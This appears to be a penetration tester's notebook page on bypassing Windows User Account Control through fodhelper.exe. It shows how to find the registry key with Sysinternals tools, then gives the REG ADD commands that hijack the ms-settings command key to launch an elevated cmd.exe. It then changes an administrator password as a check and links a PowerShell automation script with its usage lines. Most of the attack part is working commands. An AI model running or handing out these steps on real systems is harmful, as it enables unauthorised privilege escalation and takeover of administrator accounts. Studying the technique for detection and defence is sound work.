# UAC Bypass

## UAC bypass

User Access Control

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\***Vulnerable Binary for example : fodhelper.exe**

* **Gather info regarding exe integrity level & permission req.**

  Tool :- sigcheck.exe

  * In Cmd, cd to SysternalsSuite directory sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
  * It show that Administrator is required and Autoelevate is true
* **Gather info about how this exe interact with file system and windows registry**

  Tool : Procmon.exe (process monitor) from sysinternals

  * Open Procmon.exe tool , start fodhelper.exe , Add below filters
  * Filter: Process Name , is , fodhelper.exe , Include
  * Filter: Operation , contains , Reg , Include
  * Filter: Result , is , NAME NOT FOUND , Include
  * Filter: Path , contains , HKCU , Include
  * Now , Apply filter and locate for some interesting path that can be modified For ex: **HKCU:\Software\Classes\ms-settings\shell\open\command** can be checked.
  * Now , Change Path filter and remove Result Filter: Path , contains , ms-settings\shell\open\command , Include
  * Check If the process can successfully access that key in some other hive, the results will provide us with more clues. Like When **HKCU:\Software\Classes\ms-settings\shell\open\command** is not found . It locate HKCR which exist and is successful
  * As exe tries to find **HKCU:\Software\Classes\ms-settings\shell\open\command** first , the path can be modified as we have necessary permission to edit it
  * Add this key with **REG** utility in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
  * Now, restart the fodhelper.exe and add 1st four filters
  * Vuln exe is looking **DelegateExecute** in new added key
  * Add **DelegateExecute** with empty value in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG\_SZ
  * Again , restart the fodhelper.exe and add 1st . 2nd , 4th filters
  * This time it is suucessful but since **DelegateExecute** is empty , it also look for *(Default)*  entry value of the **Shell\open\command** registry key. The *(Default)* entry value is created as null automatically when adding any registry key
  * Replace the empty *(Default)* value with an executable of our choice, **cmd.exe** in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
  * **Exploit**
    * Restart fothelper.exe , it will now open **CMD** automatically with high intergrity level
    * To check , if we have successfully achieve high integrity , try to change admin password net user admin Ev!lpass
  * **Automation tool**
    * <https://github.com/CsEnox/EventViewer-UACBypass>
    * Import-Module .\Invoke-EventViewer.ps1
    * Invoke-EventViewer cmd.exe